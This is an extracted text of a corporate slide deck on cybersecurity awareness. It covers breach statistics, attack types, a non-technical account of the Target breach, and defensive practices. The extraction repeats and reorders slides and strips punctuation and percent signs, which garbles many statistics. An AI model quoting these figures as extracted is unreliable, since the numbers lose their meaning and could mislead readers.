backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC3
Personal Introduction
Graduated from TU with a Bachelorrsquos Degree in Accounting and MIS
Dad of Four Sophie (17) Zoe (15) Sadie (12) Rocco (8)
Started Career as an ERP Systems Implementation Consultant then spent 10 years with PricewaterhouseCoopers (PwC)
Joined Stinnett amp Associates as a Principal in 2006
Has his CPA CIA and CISA certifications
Significant experience in Business Process and IT Consulting IT and Application Controls and Risk Management
Industries include energy with heavy upstream focus manufacturing and telecommunications
Background
Interests
Golf four kids limit my opportunities
Did I mention the four kids Interests are limited
The Great Circus that is our Political System
Vegas during March Madness
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
